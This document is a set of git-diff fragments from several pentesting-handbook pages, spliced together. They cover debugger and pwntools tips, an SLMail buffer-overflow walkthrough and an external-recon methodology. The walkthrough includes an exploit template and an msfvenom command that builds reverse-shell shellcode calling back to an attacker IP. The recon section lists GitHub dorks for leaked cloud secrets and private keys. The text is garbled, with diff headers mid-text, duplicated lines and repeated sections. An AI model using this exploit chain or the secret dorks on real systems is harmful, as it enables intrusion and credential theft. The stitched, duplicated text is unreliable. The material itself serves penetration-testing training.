@ -124,9 +122,9 @@ gef➤ pattern search 0x6261617762616176
[+] Found at offset 184 (little-endian search) likely
```
### Tricks

#### GDB same addresses

While debugging, GDB will have **slightly different addresses than the ones used by the binary when executed.** You can make GDB have the same addresses by doing:
@ -136,7 +134,7 @@ While debugging GDB will have **slightly different addresses than the used by th
* Exploit the binary using the same absolute path
* `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary
#### Backtrace to find functions called

When you have a **statically linked binary** all the functions will belong to the binary (and not to external libraries). In this case it will be difficult to **identify the flow that the binary follows to, for example, ask for user input**.\
You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** (**backtrace**) command to see the functions called:
@ -150,13 +148,13 @@ gef➤ bt
#4 0x0000000000400a5a in ?? ()
```
### GDB server

`gdbserver --multi 0.0.0.0:23947` (in IDA you have to fill in the absolute path of the executable in the Linux machine and in the Windows machine)
## Ghidra

### Find stack offset

**Ghidra** is very useful to find the **offset** for a **buffer overflow thanks to the information about the position of the local variables.**\
For example, in the example below, a buffer overflow in `local_bc` indicates that you need an offset of `0xbc`. Moreover, if `local_10` is a canary cookie it indicates that to overwrite it from `local_bc` there is an offset of `0xac`.\
@ -164,7 +162,7 @@ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
![](<../../.gitbook/assets/image (616).png>)

## GCC

**gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Compile without protections\
**-o** --> Output\
@ -175,7 +173,7 @@ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
**nasm -f elf assembly.asm** --> return a ".o"\
**ld assembly.o -o shellcodeout** --> Executable

## Objdump

**-d** --> **Disassemble executable** sections (see opcodes of a compiled shellcode, find ROP Gadgets, find function address...)\
**-Mintel** --> **Intel** syntax\
@ -188,13 +186,13 @@ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
**objdump -t --dynamic-reloc ./exec | grep puts** --> Address of "puts" to modify in GOT\
**objdump -D ./exec | grep "VAR\_NAME"** --> Address of a static variable (those are stored in the DATA section).

## Core dumps

1. Run `ulimit -c unlimited` before starting the program
2. Run `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t`
3. Run `sudo gdb --core=<path/core> --quiet`

## More

**ldd executable | grep libc.so.6** --> Address (if ASLR, then this changes every time)\
**for i in \`seq 0 20\`; do ldd \<executable> | grep libc; done** --> Loop to see if the address changes a lot\
@ -204,16 +202,16 @@ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
**strace executable** --> Functions called by the executable\
**rabin2 -i executable -->** Address of all the functions

## **Immunity Debugger**

```bash
!mona modules #Get protections, look for all false except last one (Dll of SO)
!mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes inside dll space (JMP ESP)
```
## IDA

### Debugging in remote linux

Inside the IDA folder you can find binaries that can be used to debug a binary inside a Linux machine. To do so, move the binary _linux\_server_ or _linux\_server64_ to the Linux server and run it inside the folder that contains the binary:


@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
# PwnTools
```
pip3 install pwntools
```

## Pwn asm

Get opcodes from line or file.
@ -39,7 +37,7 @@ pwn asm -i <filepath>
* avoid bytes (new lines, null, a list)
* select encoder debug shellcode using gdb run the output

## **Pwn checksec**

Checksec script
@ -47,9 +45,9 @@ Checksec script
pwn checksec <executable>
```

## Pwn constgrep

## Pwn cyclic

Get a pattern
@ -65,7 +63,7 @@ pwn cyclic -l faad
* context (16,32,64,linux,windows...)
* Take the offset (-l)

## Pwn debug

Attach GDB to a process
@ -81,7 +79,7 @@ pwn debug --process bash
* gdbscript to execute
* sysrootpath

## Pwn disablenx

Disable nx of a binary
@ -89,7 +87,7 @@ Disable nx of a binary
pwn disablenx <filepath>
```

## Pwn disasm

Disassemble hex opcodes
@ -103,7 +101,7 @@ pwn disasm ffe4
* base address
* color(default)/no color

## Pwn elfdiff

Print differences between 2 files
@ -111,7 +109,7 @@ Print differences between 2 fiels
pwn elfdiff <file1> <file2>
```

## Pwn hex

Get hexadecimal representation
@ -119,7 +117,7 @@ Get hexadecimal representation
pwn hex hola #Get hex of "hola" ascii
```

## Pwn phd

Get hexdump
@ -133,11 +131,11 @@ pwn phd <file>
* Number of bytes per line highlight byte
* Skip bytes at beginning

## Pwn pwnstrip

## Pwn scramble

## Pwn shellcraft

Get shellcodes
@ -164,7 +162,7 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
* list possible shellcodes
* Generate ELF as a shared library

## Pwn template

Get a python template
@ -174,7 +172,7 @@ pwn template
**Can select:** host, port, user, pass, path and quiet

## Pwn unhex

From hex to string
@ -182,7 +180,7 @@ From hex to string
pwn unhex 686f6c61
```

## Pwn update

To update pwntools


@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
# Windows Exploiting (Basic Guide - OSCP lvl)

## **Start installing the SLMail service**

## Restart SLMail service

Every time you need to **restart the service SLMail** you can do it using the windows console:
@ -31,7 +29,7 @@ net start slmail
![](<../.gitbook/assets/image (23).png>)

## Very basic python exploit template

```python
#!/usr/bin/python
@ -55,11 +53,11 @@ except:
print "Could not connect to "+ip+":"+port
```

## **Change Immunity Debugger Font**

Go to `Options >> Appearance >> Fonts >> Change(Consolas, Bold, 9) >> OK`

## **Attach the process to Immunity Debugger:**

**File --> Attach**
@ -67,13 +65,13 @@ Go to `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
**And press the START button**

## **Send the exploit and check if EIP is affected:**

![](<../.gitbook/assets/image (25).png>)

Every time you break the service you should restart it as indicated at the beginning of this page.

## Create a pattern to modify the EIP

The pattern should be as big as the buffer you used to break the service previously.
@ -113,7 +111,7 @@ With this buffer the EIP crashed should point to 42424242 ("BBBB")
Looks like it is working.

## Check for Shellcode space inside the stack

600B should be enough for any powerful shellcode.
@ -133,7 +131,7 @@ You can see that when the vulnerability is reached, the EBP is pointing to the s
In this case we have **from 0x0209A128 to 0x0209A2D6 = 430B.** Enough.
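That figure is just the distance between the two stack addresses observed in the debugger:

```python
# Distance between the start of our buffer and the end of the usable stack area
space = 0x0209A2D6 - 0x0209A128
print(space)  # 430 bytes available for the shellcode
```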
## Check for bad chars

Change again the buffer:
@ -173,7 +171,7 @@ In this case you can see that **the char 0x0D is avoided**:
![](<../.gitbook/assets/image (34).png>)
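A common way to build that test buffer is to send every byte value except the ones already known to be bad, then compare memory in the debugger. A sketch (the bad-byte set matches the `\x00\x0a\x0d` excluded by the msfvenom commands on this page):

```python
# Bytes already known to break the protocol (NULL, \n, \r)
known_bad = {0x00, 0x0a, 0x0d}

# Every remaining byte value, in order, so a missing/changed byte is easy to spot
badchar_test = bytes(b for b in range(0x01, 0x100) if b not in known_bad)

print(len(badchar_test))  # 255 - 2 = 253 bytes (0x00 excluded by starting at 0x01)
```

Each time the debugger shows a corrupted or truncated byte, add it to `known_bad` and resend until the whole buffer arrives intact.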
## Find a JMP ESP as a return address

Using:
@ -204,7 +202,7 @@ Now, inside this memory you should find some JMP ESP bytes, to do that execute:
**In this case, for example: **_**0x5f4a358f**_
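Remember that x86 is little-endian, so the chosen return address has to be byte-reversed when it is placed in the buffer:

```python
import struct

# Pack the example JMP ESP address found above as a little-endian 32-bit value
ret_address = struct.pack("<I", 0x5f4a358f)
print(ret_address.hex())  # 8f354a5f
```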
## Create shellcode

```
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
@ -268,7 +266,7 @@ except:
There are shellcodes that will **overwrite themselves**, therefore it's important to always add some NOPs before the shellcode
{% endhint %}

## Improving the shellcode
Add this parameters: Add this parameters:


@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
# External Recon Methodology
{% hint style="danger" %}
Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**?

[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
# Assets discoveries
> So you were told that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns.
The goal of this phase is to obtain all the **companies owned by the main company**.
3. Use reverse whois lookups to search for other entries \(organisation names, domains...\) related to the first one \(this can be done recursively\)
4. Use other techniques like shodan `org` and `ssl` filters to search for other assets \(the `ssl` trick can be done recursively\).
## Acquisitions
First of all, we need to know which **other companies are owned by the main company**.
One option is to visit [https://www.crunchbase.com/](https://www.crunchbase.com/), **search** for the **main company**, and **click** on "**acquisitions**". There you will see other companies acquired by the main one.
Another option is to visit the **Wikipedia** page of the main company and search for **acquisitions**.
> Ok, at this point you should know all the companies inside the scope. Let's figure out how to find their assets.
## ASNs
An autonomous system number \(**ASN**\) is a **unique number** assigned to an **autonomous system** \(AS\) by the **Internet Assigned Numbers Authority \(IANA\)**.
An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators.
```
amass intel -asn 8911,50313,394161
```
You can also find the IP ranges of an organisation using [http://asnlookup.com/](http://asnlookup.com/) \(it has a free API\).
You can find the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4info.com/).
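Once you have the ASNs, the announced ranges can also be pulled from a route registry \(e.g. `whois -h whois.radb.net -- '-i origin AS8911'`\) and parsed. A sketch over a hypothetical response \(the sample text below is illustrative, not real RADB output\):

```python
import re

# Hypothetical snippet of a RADB whois response for one ASN
sample = """\
route:      213.219.36.0/22
descr:      example block
origin:     AS8911
route:      198.51.100.0/24
"""

# route: (IPv4) and route6: (IPv6) objects carry the announced prefixes
prefixes = re.findall(r"^route6?:\s*(\S+)", sample, re.M)
print(prefixes)  # → ['213.219.36.0/22', '198.51.100.0/24']
```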
## Looking for vulnerabilities
At this point we know **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** \(Nessus, OpenVAS\) over all the hosts.
Also, you could launch some [**port scans**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) or use services like **shodan** to find **open ports**, and depending on what you find you should **take a look in this book at how to pentest the possible services running**.
Also, it could be worth mentioning that you can prepare some **default username** and **password** lists and try to **bruteforce** services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
# Domains
> We know all the companies inside the scope and their assets, it's time to find the domains inside the scope.
_Please note that with the following proposed techniques you can also find subdomains._
First of all you should look for the **main domain**\(s\) of each company. For example, for _Tesla Inc._ it is going to be _tesla.com_.
## Reverse DNS
As you have found all the IP ranges of the domains you could try to perform **reverse dns lookups** on those **IPs to find more domains inside the scope**. Try to use some dns server of the victim or some well-known dns server \(1.1.1.1, 8.8.8.8\).
```
dnsrecon -r 157.240.221.35/24 -n 8.8.8.8 #Using google dns
```
For this to work, the administrator has to manually enable the PTR records.
You can also use an online tool for this info: [http://ptrarchive.com/](http://ptrarchive.com/)
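The same reverse lookups can be scripted. A minimal sketch using the system resolver \(swap in the victim's DNS where allowed; IPs without a PTR are simply skipped\):

```python
import ipaddress
import socket

def reverse_lookup(cidr):
    # Map IP -> PTR name for every host in the range, skipping misses
    found = {}
    for ip in ipaddress.ip_network(cidr).hosts():
        try:
            found[str(ip)] = socket.gethostbyaddr(str(ip))[0]
        except (socket.herror, OSError):
            pass
    return found

# e.g. reverse_lookup("157.240.221.0/28")
```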
## Reverse Whois \(loop\)
Inside a **whois** you can find a lot of interesting **information** like the **organisation name**, **address**, **emails**, phone numbers... Even more interesting is that you can find **more assets related to the company** if you perform **reverse whois lookups by any of those fields** \(for example other whois registries where the same email appears\).
You can use online tools like:
You can also perform some automatic reverse whois discovery with [amass](https://github.com/OWASP/Amass).
**Note that you can use this technique to discover more domain names every time you find a new domain.**
## Trackers
If you find the **same ID of the same tracker** in 2 different pages you can suppose that **both pages** are **managed by the same team**.
For example, if you see the same **Google Analytics ID** or the same **Adsense ID** on several pages.
There are some pages that let you search by these trackers and more:
* [**Publicwww**](https://publicwww.com/)
* [**SpyOnWeb**](http://spyonweb.com/)
## **Favicon**
Did you know that we can find related domains and subdomains to our target by looking for the same favicon icon hash? This is exactly what the [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) tool made by [@m4ll0k2](https://twitter.com/m4ll0k2) does. Here's how to use it:
```
python3 favihash.py -f https://target/favicon.ico -t targets.txt -s
```
Simply said, favihash will allow us to discover domains that have the same favicon icon hash as our target.
## Other ways
**Note that you can use this technique to discover more domain names every time you find a new domain.**
### Shodan
You already know the name of the organisation owning the IP space, so you can search for that data in shodan using: `org:"Tesla, Inc."` Check the found hosts for new unexpected domains in the TLS certificate.
You could access the **TLS certificate** of the main web page, obtain the **Organisation name** and then search for that name inside the **TLS certificates** of all the web pages known by **shodan** with the filter: `ssl:"Tesla Motors"`
### Google
Go to the main page and find something that identifies the company, like the copyright \("Tesla © 2020"\). Search for that in google or other search engines to find possible new domains/pages.
### Assetfinder
[**Assetfinder**](https://github.com/tomnomnom/assetfinder) is a tool that looks for **domains related** to a main domain and **subdomains** of them, pretty amazing.
## Looking for vulnerabilities
Check for some [domain takeover](pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using a domain** but they **lost the ownership**. Just register it \(if cheap enough\) and let the company know.
If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** \(using Nessus or OpenVAS\) and some [**port scan**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.
_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
# Subdomains
> We know all the companies inside the scope, all the assets of each company and all the domains related to the companies.
It's time to find all the possible subdomains of each found domain.
## DNS
Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** \(If vulnerable, you should report it\).
```
dnsrecon -a -d tesla.com
```
## OSINT
The fastest way to obtain a lot of subdomains is to search in external sources. I'm not going to discuss which sources are the best and how to use them, but you can find several utilities here: [https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html)
```
assetfinder --subs-only <domain>
```
Another possibly interesting tool is [**gau**](https://github.com/lc/gau)**.** It fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl for any given domain.
### [chaos.projectdiscovery.io](https://chaos.projectdiscovery.io/#/)
This project offers for **free all the subdomains related to bug-bounty programs**. You can also access this data using [chaospy](https://github.com/dr-0x0x/chaospy) or even access the scope used by this project: [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list)
You could also find subdomains by scraping web pages and parsing them \(including JS files\) searching for subdomains using [SubDomainizer](https://github.com/nsonaniya2010/SubDomainizer) or [subscraper](https://github.com/Cillian-Collins/subscraper).
### RapidDNS
Quickly find subdomains using the [RapidDNS](https://rapiddns.io/) API \(from [link](https://twitter.com/Verry__D/status/1282293265597779968)\):
```
curl -s "https://rapiddns.io/subdomain/$1?full=1"
```
### Shodan
If you found **dev-int.bigcompanycdn.com**, you can make a Shodan query like the following:
* http.html:"dev-int.bigcompanycdn.com"
* http.html:"https://dev-int-bigcompanycdn.com"
## DNS Brute force
Let's try to find new **subdomains** by brute-forcing DNS servers using possible subdomain names.
The most recommended tools for this are [**massdns**](https://github.com/blechschmidt/massdns)**,** [**gobuster**](https://github.com/OJ/gobuster)**,** [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) **and** [**shuffledns**](https://github.com/projectdiscovery/shuffledns). The first one is faster but more prone to errors \(you should always check for **false positives**\) and the second one **is more reliable** \(always use gobuster\).
```
puredns bruteforce all.txt domain.com
```
Note how these tools require a **list of IPs of public DNSs**. If these public DNSs are malfunctioning \(DNS poisoning for example\) you will get bad results. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them.
## VHosts
### IP VHosts
You can find some VHosts in IPs using [HostHunter](https://github.com/SpiderLabs/HostHunter)
### Brute Force
If you suspect that some subdomain can be hidden in a web server you could try to brute force it:
```
vhostbrute.py --url="example.com" --remoteip="10.1.1.15" --base="www.example.com"
```
With this technique you may even be able to access internal/hidden endpoints.
{% endhint %}
## CORS Brute Force
Sometimes you will find pages that only return the header _**Access-Control-Allow-Origin**_ when a valid domain/subdomain is set in the _**Origin**_ header. In these scenarios, you can abuse this behavior to **discover** new **subdomains**.
```
ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http://FUZZ.crossfit.htb' -mr "Access-Control-Allow-Origin" -ignore-body
```
## DNS Brute Force v2
Once you have finished looking for subdomains you can use [**dnsgen**](https://github.com/ProjectAnte/dnsgen) and [**altdns**](https://github.com/infosec-au/altdns) to generate possible permutations of the discovered subdomains and use **massdns** and **gobuster** again to search for new domains.
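As a sketch of the kind of permutations these tools generate \(the word list and mutation shapes below are illustrative, not dnsgen's actual rules\):

```python
def permute(subdomain, words=("dev", "staging", "01")):
    # Mutate one known subdomain: prefixed label, suffixed label, extra level
    label, _, domain = subdomain.partition(".")
    candidates = set()
    for w in words:
        candidates.add(f"{w}-{label}.{domain}")
        candidates.add(f"{label}-{w}.{domain}")
        candidates.add(f"{w}.{subdomain}")
    return sorted(candidates)

print(permute("api.tesla.com"))
```

The resulting candidates are then resolved in bulk with massdns/gobuster; only the names that actually resolve are kept.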
## Buckets Brute Force
While looking for **subdomains** keep an eye out for any **pointing** to any type of **bucket**, and in that case [**check the permissions**](pentesting/pentesting-web/buckets/)**.**
Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](pentesting/pentesting-web/buckets/).
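A sketch of generating candidate bucket names from a domain before feeding them to a permission checker \(the suffix list is illustrative\):

```python
def bucket_candidates(domain, suffixes=("backup", "assets", "prod", "dev")):
    # Common pattern: the bare company name plus name-suffix variants
    name = domain.split(".")[0]
    return [name] + [f"{name}-{s}" for s in suffixes]

print(bucket_candidates("tesla.com"))
```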
## Monitoring
You can **monitor** whether **new subdomains** of a domain are created by monitoring the **Certificate Transparency** Logs, as [**sublert**](https://github.com/yassineaboukir/sublert/blob/master/sublert.py) does.
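The CT logs can also be queried ad hoc, e.g. via the JSON that crt.sh returns. A sketch parsing a hypothetical response \(the sample string stands in for the body of `https://crt.sh/?q=%25.tesla.com&output=json`\):

```python
import json

# Hypothetical fragment of a crt.sh JSON response
sample = '[{"name_value": "dev.tesla.com\\nwww.tesla.com"}, {"name_value": "mail.tesla.com"}]'

# One certificate may cover several names, newline-separated in name_value
subs = sorted({name
               for entry in json.loads(sample)
               for name in entry["name_value"].split("\n")})
print(subs)  # → ['dev.tesla.com', 'mail.tesla.com', 'www.tesla.com']
```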
## Looking for vulnerabilities
Check for possible [**subdomain takeovers**](pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).
If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](pentesting/pentesting-web/buckets/).
If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** \(using Nessus or OpenVAS\) and some [**port scan**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.
_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
# Web servers hunting
> We have found all the companies and their assets and we know IP ranges, domains and subdomains inside the scope. It's time to search for web servers.
```
cat /tmp/domains.txt | httprobe #Test all domains inside the file for ports 80 and 443
cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check ports 80, 443, 8080 and 8443
```
## Screenshots
Now that you have discovered **all the web servers** running in the scope \(in **IPs** of the company and all the **domains** and **subdomains**\) you probably **don't know where to start**. So, let's make it simple and start by just taking screenshots of all of them. Just by **taking a look** at the **main page** of each of them you could find **weird** endpoints that are more **prone** to be **vulnerable**.
To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), [**Aquatone**](https://github.com/michenriksen/aquatone), [**shutter**](https://shutter-project.org/downloads/) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.**
# Recapitulation 1
> Congratulations! At this point you have already performed all the basic enumeration. Yes, it's basic because a lot more enumeration can be done \(we will see more tricks later\).
> Did you know that BB experts recommend spending only 10-15 mins on this phase? But don't worry, once you have practised you will do this even faster than that.
Then, it's time for the real Bug Bounty hunt! In this methodology I'm **not going to talk about how to scan hosts** \(you can see a [guide for that here](pentesting/pentesting-network/)\), how to use tools like Nessus or OpenVAS to perform a **vuln scan** or how to **look for vulnerabilities** in the open services \(this book already contains tons of information about possible vulnerabilities on a lot of common services\). **But, don't forget that if the scope allows it, you should give it a try.**
# **Bug hunting OSINT related information**
Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits.
## Api keys leaks in github
* [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber)
* [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit)
**Dorks**: _AWS\_SECRET\_ACCESS\_KEY, API KEY, API SECRET, API TOKEN… ROOT PASSWORD, ADMIN PASSWORD, COMPANYNAME SECRET, COMPANYNAME ROOT, GCP SECRET, AWS SECRET, “username password” extension:sql, “private” extension:pgp..._
#### More Github Dorks ### More Github Dorks
* extension:pem private * extension:pem private
* extension:ppk private * extension:ppk private
You can also search for leaked secrets in all open repository platforms using: [https://searchcode.com/?q=auth\_key](https://searchcode.com/?q=auth_key)

# [**Pentesting Web Methodology**](pentesting/pentesting-web/)

Anyway, the **majority of the vulnerabilities** found by bug hunters reside in **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](pentesting/pentesting-web/).

# Recapitulation 2

> Congratulations! The testing has finished! I hope you have found some vulnerabilities.
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
# Assets discovery

> So you were told that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns.
3. Use reverse whois lookups to search for other entries (organisation names, domains...) related to the first one (this can be done recursively)
4. Use other techniques like shodan `org` and `ssl` filters to search for other assets (the `ssl` trick can be done recursively).

## **Acquisitions**

First of all, we need to know which **other companies are owned by the main company**.\
One option is to visit [https://www.crunchbase.com/](https://www.crunchbase.com), **search** for the **main company**, and **click** on "**acquisitions**". There you will see other companies acquired by the main one.
> Ok, at this point you should know all the companies inside the scope. Let's figure out how to find their assets.

## **ASNs**

An autonomous system number (**ASN**) is a **unique number** assigned to an **autonomous system** (AS) by the **Internet Assigned Numbers Authority (IANA)**.\
An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators.
You can also find the IP ranges of an organisation using [http://asnlookup.com/](http://asnlookup.com) (it has a free API).\
You can find the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4info.com).

## **Looking for vulnerabilities**

At this point we know **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** (Nessus, OpenVAS) over all the hosts.\
Also, you could launch some [**port scans**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) **or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book at how to pentest the possible services running.\
**Also, it could be worth mentioning that you can also prepare some** default username **and** password **lists and try to** bruteforce services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
# Domains

> We know all the companies inside the scope and their assets, it's time to find the domains inside the scope.
First of all you should look for the **main domain**(s) of each company. For example, for _Tesla Inc._ it is going to be _tesla.com_.

## **Reverse DNS**

As you have found all the IP ranges of the domains, you could try to perform **reverse DNS lookups** on those **IPs to find more domains inside the scope**. Try to use some DNS server of the victim or some well-known DNS server (1.1.1.1, 8.8.8.8).
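Tools like `dnsrecon` automate this, but the underlying idea is simple. A minimal sketch (Python standard library only; the range below is illustrative) that builds the PTR query name for every address in a range and resolves it best-effort:

```python
import ipaddress
import socket

def ptr_names(cidr: str):
    """Yield (ip, PTR query name) for every usable address in a range."""
    for ip in ipaddress.ip_network(cidr).hosts():
        # e.g. 157.240.221.35 -> "35.221.240.157.in-addr.arpa"
        yield str(ip), ip.reverse_pointer

def reverse_lookup(ip: str):
    """Best-effort PTR resolution; returns None when no record exists."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None

if __name__ == "__main__":
    for ip, ptr in ptr_names("157.240.221.32/30"):
        print(ip, ptr, reverse_lookup(ip))
```

Any hostname that comes back belonging to the target is a new in-scope domain candidate.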
For this to work, the administrator has to manually enable the PTR records.\
You can also use an online tool for this info: [http://ptrarchive.com/](http://ptrarchive.com)

## **Reverse Whois (loop)**

Inside a **whois** you can find a lot of interesting **information** like **organisation name**, **address**, **emails**, phone numbers... But what is even more interesting is that you can find **more assets related to the company** if you perform **reverse whois lookups by any of those fields** (for example other whois registries where the same email appears).\
You can use online tools like:
**Note that you can use this technique to discover more domain names every time you find a new domain.**

## **Trackers**

If you find the **same ID of the same tracker** on 2 different pages, you can suppose that **both pages** are **managed by the same team**.\
For example, if you see the same **Google Analytics ID** or the same **Adsense ID** on several pages.
* [**Publicwww**](https://publicwww.com)
* [**SpyOnWeb**](http://spyonweb.com)
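The extraction side of this trick is easy to script yourself. A minimal sketch (Python standard library only; the regexes are illustrative simplifications, real pages may embed IDs in other forms such as GA4 `G-` IDs) that pulls tracker IDs out of fetched HTML so you can compare them across sites:

```python
import re

# Illustrative patterns for the two trackers mentioned above.
TRACKER_PATTERNS = {
    "google_analytics": re.compile(r"\bUA-\d{4,10}-\d{1,4}\b"),
    "adsense": re.compile(r"\bca-pub-\d{10,16}\b"),
}

def extract_trackers(html: str) -> dict:
    """Return every tracker ID found in a page, grouped by tracker type."""
    return {name: sorted(set(rx.findall(html))) for name, rx in TRACKER_PATTERNS.items()}

html = '<script>ga("create", "UA-12345678-1");</script><ins data-ad-client="ca-pub-1234567890123456">'
print(extract_trackers(html))
# If two in-scope pages share any of these IDs, they are likely run by the same team.
```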
## **Favicon**

Did you know that we can find related domains and subdomains to our target by looking for the same favicon icon hash? This is exactly what the [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) tool made by [@m4ll0k2](https://twitter.com/m4ll0k2) does. Here's how to use it:
```bash
shodan search org:"Target" http.favicon.hash:116323821 --fields ip_str,port --separator " " | awk '{print $1":"$2}'
```
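That favicon hash is the 32-bit MurmurHash3 (signed, as `mmh3.hash()` returns it) of the favicon's base64 encoding; note that Shodan hashes the newline-wrapped base64, as produced by Python's `base64.encodebytes`. Normally you would just `pip install mmh3`, but as a sketch of what is being computed, here is a pure-standard-library version:

```python
import base64

def murmur3_32(data: bytes, seed: int = 0) -> int:
    """Pure-Python MurmurHash3 x86 32-bit, returned signed like mmh3.hash()."""
    c1, c2, h = 0xCC9E2D51, 0x1B873593, seed
    rounded = len(data) - (len(data) % 4)
    for i in range(0, rounded, 4):
        k = int.from_bytes(data[i:i + 4], "little")
        k = (k * c1) & 0xFFFFFFFF
        k = ((k << 15) | (k >> 17)) & 0xFFFFFFFF
        k = (k * c2) & 0xFFFFFFFF
        h ^= k
        h = ((h << 13) | (h >> 19)) & 0xFFFFFFFF
        h = (h * 5 + 0xE6546B64) & 0xFFFFFFFF
    k, tail = 0, data[rounded:]
    if len(tail) >= 3:
        k ^= tail[2] << 16
    if len(tail) >= 2:
        k ^= tail[1] << 8
    if tail:
        k ^= tail[0]
        k = (k * c1) & 0xFFFFFFFF
        k = ((k << 15) | (k >> 17)) & 0xFFFFFFFF
        h ^= (k * c2) & 0xFFFFFFFF
    h ^= len(data)
    h ^= h >> 16
    h = (h * 0x85EBCA6B) & 0xFFFFFFFF
    h ^= h >> 13
    h = (h * 0xC2B2AE35) & 0xFFFFFFFF
    h ^= h >> 16
    return h - 0x100000000 if h & 0x80000000 else h  # sign like mmh3

def favicon_hash(favicon_bytes: bytes) -> int:
    """Shodan-style favicon hash: murmur3 of the newline-wrapped base64 body."""
    return murmur3_32(base64.encodebytes(favicon_bytes))
```

Fetch `https://target/favicon.ico`, run it through `favicon_hash`, and search Shodan for `http.favicon.hash:<value>` to find other hosts serving the same icon.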
## **Other ways**

**Note that you can use this technique to discover more domain names every time you find a new domain.**
[**Assetfinder**](https://github.com/tomnomnom/assetfinder) is a tool that looks for **domains related** to a main domain and their **subdomains**, pretty amazing.

## **Looking for vulnerabilities**

Check for some [domain takeover](../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using a domain** but they **lost the ownership**. Just register it (if cheap enough) and let the company know.

